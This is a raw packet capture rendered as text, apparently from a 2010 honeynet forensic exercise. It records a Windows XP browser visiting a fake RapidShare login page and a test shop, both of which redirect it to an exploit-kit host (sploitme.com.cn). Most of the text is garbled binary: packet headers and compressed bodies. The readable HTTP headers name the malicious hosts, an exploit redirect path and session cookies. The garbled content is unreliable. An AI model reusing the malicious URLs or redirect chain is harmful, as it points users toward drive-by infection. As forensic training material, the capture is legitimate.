(D]%YǖAPt8fNlmE5W{M^њڄ˘tLp~ùHŨV6Jgc+J T$zg[<7J˨L-)/|<V;=KHt' RT5E\@"Uc PA*vPpEܐ;1bS]~bؿPxar?ziGP#G*(,V꨷P@thL;=- Z]#`9cjf)0p'3?%0us.pC 4Qd\ʰ\ T8UQ#BE[;LeW٢j6 H1^lYo|RUη}90ln#Vd*8KR\ N`A;Zf*+f8SMdLYf଒*H(a%I~sFj И[/bӫgq5߫$npkϗI eID;㈎nm9ڝ@VETUfYC=DħѶ,O܇і5mT`$۰(4 /}Ztd{R 4r3y%[w/Lx#Jٽ^J{@@e<%s upNRaȄ#,XC*UJBt⏈|y2;Z @PB22g4\tY&=`f쟿WOaFѰ<9|4G'd<#@%#޼g<#d~QW)/H9m by)81pilp2DڍI Q߭j/DaŠ y}L7K ! z._n{ ;hag3S/O122We&bg@␚$4+o^L(LCC%^8)Og%Ȟ˻D! 
ڒ(e>"oMD2s߾fx pRVA]{ޒsxo/ kXb&-_R%Awigd;uI$*OTm Jĭ#ʝBm߶;P"?5z/Gm>wIx}~9ݾ.@SamX8ߎʃPmK6lA pӵ, }F'" S( }ОʼHG5Dڳ`=8 q4GgI)Og3<1tWsvf2H}F;(n66bH4[bǥp6ká%ੜcx/ԇB 6 Y^dEfT3%VQ izogG+gͅ _m4w~v@CC}t72+ ?-'{Q R X)W';f?62`gFRCڀ;*Yi x#ynD Ug"\Rf/keԃB vr!$ˏ(Ѐ A^ZPȊV;=Kvy<<RT5' E(@6 UcAPv+PV;=K]' RT5E]@!Uc PA+vPu"/P.$'X;xy$qQ,5MVGf?wy4XNbBD`(? A6]IuN0u8n~Qo&wQm??~vz{B?~?wݏm9ҋoNϷuu=1cӿim\18Loasp:9?@L&N;:;}߹!gZ{.#>n7ÍsF[{`;i`4+?"wjpgG;[ͯq{+ MűƯl"O _`0jq^`.,T%\!eڲFɅ/uaE)ϗ:;}_Ěyjbvc?9B^kFT8gHL˗Ɨڌ_1 0^=nWmϧ[PMe 3S'XcqFgB\D% Kma(#(2 9rsr[RݝG-\b~Ajor ~ |D;*{?? $}73|fșeR~8l=^ ıpReqYk{KBeAc qWtŅ,Kpܹ%wm(f57[ MCXlѰل/;X#;C9RlͱP`s b~hȠxY =H.'!I¬67sS&\C(@D6 D£aEϧ,ǫiG%B RcEސe|Z:r,{ıA~ۖ9a|)Ei()#>'nJ(#wi9e9u?&OmK4Bmʏ>JΊB*u\.zN`2 Ick*ؗ`}A]n w?dbX@°tWdEb?`%A0#Yp eB={܅'DkXlG[E"YnY&g@N$[R È@cԄ'BXOdF)1RDJam| t}B=a1gzNc:)\ʳZzWӕF~im&ņA_]7qnw~]77wV WcGnzɬ}3v@ul^{w"rnzIX} ]t{V8Ʒ'ݤ1My5vnyxW܉gꛇU{sV;=Kxx' RT5Ej^@hUc PA+vP=GO!( OqvXW dJYQgRdXXàV;=K(<<RT5' E(@6 UcAPv+PGET /fV;=K:_' RT5E_@Uc PA+vPׁIce;~ۖ Xĥ#`d<1r(5S *dK>~;,&GC`e$;R_\/HѩT +n9CsHBּƦ,)LB^eS]b%:F>mr!gpKN~ ,#F>[o~p}t/';zioiwN{?'z'3U*R UTa Y>RT5' E0@6t UdBP TpV;=K""' RT5Ec@Uc PA+ vzP[HTTP/1.1 204 No Content Content-Length: 0 Date: Wed, 21 Jan 2004 19:51:30 GMT Pragma: no-cache Cache-Control: private, no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Content-Type: text/html Server: Golfe X-XSS-Protection: 0 V;=K::' RT5E,d@Ud PB, U`֐V;=K<<RT5' E(@6z UdBP U,P\ DIEGEV;=K RT5' E@4 UdBP U,P|GET /generate_204 HTTP/1.1 Accept: */* Referer: http://www.google.fr/ Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: clients1.google.fr Connection: Keep-Alive Cookie: PREF=ID=e2e4041cfce38490:U=d268ee4913870d14:TM=1264084848:LM=1264769134:S=idyeS_ZtlvevQq-B; NID=31=jTf84Bsx_VBZ3zZESENLEMM0EN5d01u_AF2pZK0EIKTFpo4RLNSPmrGdelxrx6WlfXI0OdM0UwqYMdwIS7T4AXzWq7dXkxmQjKFPsc8VCV9JwME0Xzblz3XlEbYWwfzn V;=KF66' RT5E(e@Ud PB, >RT5' E0@H 82CPfջ'p[Y;=Kr ::' RT5E,g@t|82 PC2fջ(`hY;=K0~ <<RT5' E(@N 
82CPfջ(2P4GET / Y;=Kؓ ffRT5' EX@ 82CPfջ(2PA^GET /login.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: rapidshare.com.eyu32.ru Connection: Keep-Alive Y;=K 66' RT5E(h@t82 PC2fռXPY;=K ' RT5Ei@n82 PC2fռXP8uHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:06:04 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 1508 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html Vmo6_jl![ǒI 5)-֒RT7QcC ~ɻ{Ew :ys޽!n5e88D7%S8_,dw<j:HTbŝP]edJ[׃?r 'I#maJqw:BTFX:Œ;YtRbz Tad]b5ㅢro6Z4RNyF-.u&2H+VH,JhR,&eiTEd/ie ̀[ӄa!_O<7>a>^-^pΓ j)[UA>Oҹ9q%UUO&;s둈؉k%!փ B6 푃9!jag@RpОosNYt>Ff=]Eͣ[0~|83}K0%aCx4k.D^ˮӯ%J~^ٳ>;==o?}dO>X{ܣ33'oW } C{ac З :CE9ΰ%P'[Ԛ9Xc r+/=gs?ѡz4ңW:HCsP/tJupONL%STW- TRHGzh'?禗 Y;=K <<RT5' E(@K 82CPfռX2 PY;=KERT5' E@ 82CPfռX2 PQGET /images/sslstyles.css HTTP/1.1 Accept: */* Referer: http://rapidshare.com.eyu32.ru/login.php Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Tue, 02 Feb 2010 17:38:05 GMT If-None-Match: "5e472-fef-47ea19070f940" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: rapidshare.com.eyu32.ru Connection: Keep-Alive Y;=K`F66' RT5E(k@t|82 PC2 fսPaY;=KY' RT5E l@s82 PC2 fսPHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:04 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=99 ETag: "5e472-fef-47ea19070f940" Z;=K >>RT5' E0@> 84DP|%p_Z;=K(::' RT5E,m@tt84 PD3|&`Z;=K<<RT5' E(@D 84DP|&3Pp DIEGEZ;=KQQRT5' EC@* 82CPfս2P&GET /images/images/dot.jpg HTTP/1.1 Accept: */* Referer: http://rapidshare.com.eyu32.ru/login.php Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 
5.1; SV1) Host: rapidshare.com.eyu32.ru Connection: Keep-Alive Z;=K]66' RT5E(n@ty82 PC2fվPdZ;=K RT5' E@ 84DP|&3PlGET /?click=3feb5a6b2f HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://rapidshare.com.eyu32.ru/login.php Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: sploitme.com.cn Connection: Keep-Alive Z;=K#66' RT5E(o@tv84 PD3|PZ;=K\$yy' RT5Ekp@r482 PC2fվPW$HTTP/1.1 404 Not Found Date: Tue, 02 Feb 2010 19:06:04 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 276 Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 MPMO@WNH4lP Bql ݖx{3o^vV~9,˷5j1*/r~d,E7#p훣HbN`c<,Lh pިsv"Jx'JM`'`y wmx$Qu%8vE*e9Jf,cpۇև;(>Fj:@MNqu;."`eW+%V9fZ;=Km]]RT5' EO@ 82CPf2tP1GET /images/images/terminator_back.png HTTP/1.1 Accept: */* Referer: http://rapidshare.com.eyu32.ru/login.php Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: rapidshare.com.eyu32.ru Connection: Keep-Alive Z;=K66' RT5E(w@tp82 PC2tfªP1Z;=K' RT5Etx@r#82 PC2tfªPoHTTP/1.1 404 Not Found Date: Tue, 02 Feb 2010 19:06:04 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 285 Keep-Alive: timeout=15, max=95 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 MPN0+Po Ɋ}J =pBn㤪eW3;Y~5{Vz5q5jvl8  H*ƣ1llFr<~PrUw_Pƾ FHEPFa;=K <<RT5' E(@6X UcAPvz+ Pwwwga;=KK<<RT5' E(@6P Uj@P)PQa;=K*'<<RT5' E(@6U UdBP <,Pa;=K/<<RT5' E(@3 82CPfª2PGET /_a;=K_W<<RT5' E(@0 84DP|3,Pfc;=K$, ::' RT5E,z@V@r P?F`r;=Ka VV'_EH6DC4D1B<'_cSc5t='_ 8fd12edd2dc1462<MSFT 5.07 ,./!+r;=K NN'_RT5E@@\  CD,eJB<  '_cSc5  3Q6 r;=K pp'_Eb6DCNB<'_cSc5='_2 6  8fd12edd2dc1462Q8fd12edd2dc1462.<MSFT 5.07 ,./!+r;=K NN'_RT5E@@\  
CD,T;B<   '_cSc5  3Q6 r;=Kx <<'_'_  s;=K<<'_'_  B<t;=KM<<'_'_  B<u;=KO@nn'_E`  LiHK) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   u;=K\ <<^'_F(3 "u;=K\ RR'_RT5ED   F(3 "v;=K5ann'_E`  LiHK) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   v;=Kr<<^'_F(3 " DIEGEv;=KRR'_RT5ED   F(3 "w;=Knn'_E`  LiHK) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   w;=K nn'_E`  LjHK( DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   x;=K?Znn'_E`  LEL) FHEPFCELEHFCEPFFFACACACACACACAAA   y;=Konn'_E`  LEL) FHEPFCELEHFCEPFFFACACACACACACAAA   z;=Knn'_E`  LEL) FHEPFCELEHFCEPFFFACACACACACACAAA   z;=KV! nn'_E`  LEL( FHEPFCELEHFCEPFFFACACACACACACAAA   {;=KXnn'_E`  LiDM) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   {;=K?dnn'_E`  LBN) FHEPFCELEHFCEPFFFACACACACACACABO   |;=Knn'_E`  LiDM) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   |;=Knn'_E`  LBN) FHEPFCELEHFCEPFFFACACACACACACABO   };=Knn'_E`  LiDM) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   };=Knn'_E`  LBN) FHEPFCELEHFCEPFFFACACACACACACABO   };=KT= nn'_E`  LjDM( DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   };=K|= nn'_E`  LBN( FHEPFCELEHFCEPFFFACACACACACACABO   ~;=K5<<'_'_  ~;=K**'_RT5RT5 '_ ~;=K>>RT5'_E0@ 83RPFӖp~;=K2::'_RT5E,@s83 PR Fӗ`~;=K}<<RT5'_E(@ 83RPFӗ P k~;=K^^RT5'_EP@ 83RPFӗ PGET /catalog/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive ~;=KZ66'_RT5E(@s83 PR FԿP4~;=Ki'_E6  uO  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462~;=K,m'_E&  FP  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA FHEPFCELEHFCEPFFFACACACACACACABNSMB%!!V2\MAILSLOT\BROWSE8FD12EDD2DC1462U~;=K% '_RT5E@n883 PR FԿP.HTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Set-Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7; path=/catalog/; domain=shop.honeynet.sg Expires: Thu, 19 Nov 1981 08:52:00 GMT 
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2725 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html iw:;B53zxPǤe`sYږ+M~8K4+Z]t:5 )r0x k߶4};AozߡJz)e9LwOp0j[40];S eĮVjh-D⧶赲5&".6|~MSLytP<Pt-;|` :l[Kۖ.+n2"G6 {|dk -&.B!ɂV/Qѭ0NHpg|,F,3Gmj%.e#Wø< R/4xt B˟>@9H̤{Z;pz 1aZ$9ĎQiK->@0YE윫bm F D2ᣜx#+E,5x QnɍX6؈ g9~^9F5' d،_4. ["@K]zPb8dNTH\J.xe-љ]@k[ 3iYD[hCe,,FmkP G#k15hWˈ7ڦŋ0o ߩY67 1 ,w2vmwmd ږoe)&n;n61~QڕtWN bPxХ :JOR tp`T&(/optvCO~Dd=`mEB7jVSiO‚Ϧ<|,p8KRȮW:Vߐ:gĶD+o(BY4Ӵ4ˌ*a Ъ$#~;=K '_RT5E@n783 PR FԿPʑFsϘ@,]!WS?Y̘4=c+|+>ffU-w"r<,Ǽ6*rZ4{?Lˠ܄&ה˴4bu{:CԏF}ϨȋGjC銗[Roo >x<"F.kEѿmr`.C>$:[p¹N?p}AeTi[# TlJ^H+5^ڣ(=2Gm8 ӣ).spchrW1XF*V"xF,cҵ "x~sFer!Xϒ7Hq!R4x_!de-Rݚڠ*=HNҵN4$QWZţײky"e@}dED 7&~'\1BIxksn6w fYۍi &lKمA:v)+W53嶆$k:9DBoe/9}60Q::=eT'O բ#+jK (m9>fȞzbv :T;-[wwyN=vAu躲 ֌C脤{ˎLzh-&PrXfUQ'e8qMV\Ēwg`RCGŵ6025<vh/)ib CXwĀM& e0cd<b `H(z6Nz5~"  "uq8 LOi{xp1 WSFT@`a1[>A0QVǔ+Ck:u}z&-I ʲLppr*?n!Р#tvs1% ONkmMY#(&+eb;;k t3г46֥w^ W1ORUHڨ/ODNべJ /xs*t+*%*GT8)I D& wI$ ^Aq Tob~;=K <<RT5'_E(@ 83RPFԿ RP~;=K# '_RT5E@rh83 PR RFԿPCMd?eu3=*fKv%(DS'Aׅ}@]&+{EF'{rn|I9ILq?Xiwz|NaѲa᧟?YH|_p5WұzH*s%5ҥw{j= ի`@bu\$):*]ʜ:]N hMػE߼|cH4̬a<W$IeF Hm?*Tn(~G>sv0ʰ0@;⊷k+G3H1\i80LcBILƩgG.gPIzMRyүY|J~;=K#K RT5'_E@r 83RPFԿ Pz|GET /catalog/stylesheet.css HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "645ea-16de-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=KK 66'_RT5E( @s83 PR FZP~;=KX >>RT5'_E0@ 83SPp~;=K"h ::'_RT5E, @s83 PS `~;=Kl <<RT5'_E(@ 83SP P3s~;=KNq RT5'_E@f 83SP P4jGET /catalog/images/store_logo.png HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate 
If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "645b7-1f2b-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=Kq 66'_RT5E( @s83 PS dP,~;=K '_RT5E @r83 PS dPOHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=100 ETag: "645b7-1f2b-47e61676d81c0" ~;=KN '_RT5E @r83 PR FZP HTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=99 ETag: "645ea-16de-47e61676d81c0" ~;=Kx RT5'_E@a 83SPd P iGET /catalog/images/header_account.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "645b1-1b7-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=Ky 66'_RT5E(@s83 PS  P*9~;=K '_RT5E @r83 PS  PHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=99 ETag: "645b1-1b7-47e61676d81c0" ~;=K3 RT5'_E@b 83RPFZ PGET /catalog/images/header_cart.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "645d0-217-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=K 66'_RT5E(@s83 PR FPM~;=KF '_RT5E @r83 PR FP\HTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 
19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=98 ETag: "645d0-217-47e61676d81c0" ~;=Ku RT5'_E@\ 83SP P*GET /catalog/images/header_checkout.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "645e2-25d-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=K 66'_RT5E(@s83 PS P'~;=K# '_RT5E @r83 PS PcIHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=98 ETag: "645e2-25d-47e61676d81c0" ~;=Kw RT5'_E@W 83RPF PGET /catalog/images/infobox/corner_left.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "661c4-7b-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=K} 66'_RT5E(@s83 PR F٥P~;=K '_RT5E @r83 PR F٥P&HTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=97 ETag: "661c4-7b-47e61676d81c0" ~;=K RT5'_E@^ 83RPF٥ nP'GET /catalog/images/pixel_trans.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "645be-2b-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 
~;=Kw 66'_RT5E(@s83 PR nFFP@~;=K RT5'_E@N 83SP PHGET /catalog/images/infobox/corner_right_left.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "661c3-34-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=K 66'_RT5E(@s83 PS ^P% ~;=K` '_RT5E @r83 PS ^PбHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=97 ETag: "661c3-34-47e61676d81c0" ~;=KX '_RT5E @r83 PR nFFPdHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=96 ETag: "645be-2b-47e61676d81c0" ~;=K0 >>RT5'_E0@ 84TPI[Ep~;=K:C ::'_RT5E,@s84 PTI[F`l~;=KHF <<RT5'_E(@ 84TPI[FP~;=KR RT5'_E@O 83SP^ PgMGET /catalog/images/infobox/arrow_right.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "661c6-45-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=KMS 66'_RT5E(@s83 PS P"~;=KW '_RT5E @r83 PS P&HTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=96 ETag: "661c6-45-47e61676d81c0" ~;=KZ RT5'_E@ 84TPI[FP GET /?click=84c090bd86 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, 
deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: sploitme.com.cn Connection: Keep-Alive ~;=K 66'_RT5E(@s84 PTI\PJ~;=K RT5'_E@V 83RPFF OPվGET /catalog/images/libemu.png HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sun, 31 Jan 2010 09:11:08 GMT If-None-Match: "41dfd-2b1d-47e723fc3a300" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=K 66'_RT5E(@s83 PR OFP~;=K RT5'_E@' 83SP lP%GET /catalog/includes/languages/english/images/buttons/button_quick_find.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "66240-22a-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=K 66'_RT5E(@s83 PS lP~;=K '_RT5E @r83 PS lPfHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=95 ETag: "66240-22a-47e61676d81c0" ~;=KO '_RT5E !@r83 PR OFPHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=95 ETag: "41dfd-2b1d-47e723fc3a300" ~;=KWRT5'_E@A 83SP NPGET /catalog/images/table_background_default.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "645ac-36d-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: 
osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=K66'_RT5E("@s83 PS NPY~;=K'_RT5E #@r83 PS NP*HTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=94 ETag: "645ac-36d-47e61676d81c0" ~;=K+RT5'_E@O 83RPF 2P؀GET /catalog/images/phoneyc.png HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sun, 31 Jan 2010 09:11:29 GMT If-None-Match: "41dfe-400a-47e7241041240" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=K,66'_RT5E($@s83 PR 2FރP?~;=KM'_RT5E %@r83 PR 2FރP?HTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=94 ETag: "41dfe-400a-47e7241041240" ~;=K_'_RT5E&@q84 PTI\PHTTP/1.1 302 Found Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Location: http://sploitme.com.cn/fg/show.php?s=84c090bd86 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 20 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html ~;=K9RT5'_E@B 83SP 0PGET /catalog/images/infobox/corner_right.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "661c5-7b-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=KA66'_RT5E('@s83 PS 0+P~;=K..'_RT5E (@r83 PS 0+P0HTTP/1.1 304 Not Modified Date: Tue, 02 Feb 
